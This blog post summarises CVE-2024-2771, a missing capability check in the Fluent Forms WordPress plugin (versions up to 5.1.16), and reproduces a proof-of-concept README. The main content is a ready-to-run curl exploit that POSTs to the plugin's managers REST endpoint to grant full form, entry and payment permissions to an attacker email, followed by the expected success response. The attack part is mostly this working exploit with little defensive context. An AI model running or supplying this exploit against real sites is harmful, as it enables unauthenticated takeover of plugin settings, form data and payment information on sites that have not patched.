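Contact Form – Fluent Forms Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability name: Contact Form – Fluent Forms Privilege Escalation Vulnerability

Vulnerability ID: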

  • CVE: CVE-2024-2771

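Vulnerability type: Privilege escalation

Severity: High

Description: Contact Form – Fluent Forms is a WordPress plugin for creating and managing contact forms, quizzes and surveys, with a drag-and-drop form builder. It is widely used across WordPress sites and provides user-friendly form building and management. Versions 5.1.16 and earlier contain a privilege escalation vulnerability: because the /wp-json/fluentform/v1/managers REST API endpoint lacks a capability check, an unauthenticated attacker can grant a user Fluent Form management permissions, gaining access to all of the plugin's settings and features, and can even delete manager accounts. The technical root cause is insufficient access control on the REST API endpoint, which fails to verify the requester's identity and permissions, so unauthenticated users can perform high-privilege operations. The impact is severe: no authentication is required to exploit it, and it may lead to complete control of the site, including leakage of form data and tampering with payment information, posing a major threat to site security and the confidentiality of user data.

Vendor: Fluent Forms

Product: Contact Form – Fluent Forms

Affected versions: version <= 5.1.16

Source: https://github.com/whale93/CVE-2024-2771-PoC

Type: CVE-2024:github search

Repository files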

  • README.md

Source overview

CVE-2024-2771-PoC

CVE-2024-2771 Proof-of-Concept

The Contact Form Plugin by Fluent Forms for Quiz, Survey, and Drag & Drop WP Form Builder plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint in all versions up to, and including, 5.1.16. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin’s settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.

Prerequisites

  • WordPress site with Contact Form – Fluent Forms ≤ 5.1.16 active.
  • Attacker can reach the site’s REST API (no authentication needed).

Exploit Command

## 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
  -H "Content-Type: application/json" \
  -d '{
    "manager": {
      "email": "attacker@example.com",
      "permissions": [
        "fluentform_dashboard_access",
        "fluentform_forms_manager",
        "fluentform_entries_viewer",
        "fluentform_manage_entries",
        "fluentform_view_payments",
        "fluentform_manage_payments",
        "fluentform_settings_manager",
        "fluentform_full_access"
      ]
    }
  }'

Expected Response

HTTP/1.1 200 OK
{
  "message": "Manager has been saved.",
  "manager": {
    "id": 2,
    "email": "attacker@example.com",
    "permissions": [
      "fluentform_dashboard_access",
      "fluentform_forms_manager",
      "fluentform_entries_viewer",
      "fluentform_manage_entries",
      "fluentform_view_payments",
      "fluentform_manage_payments",
      "fluentform_settings_manager",
      "fluentform_full_access"
    ]
  }
}



Contact Form – Fluent Forms Privilege Escalation Vulnerability
http://example.com/2025/08/03/github_1660153936/
Author
lianccc
Published
August 3, 2025
License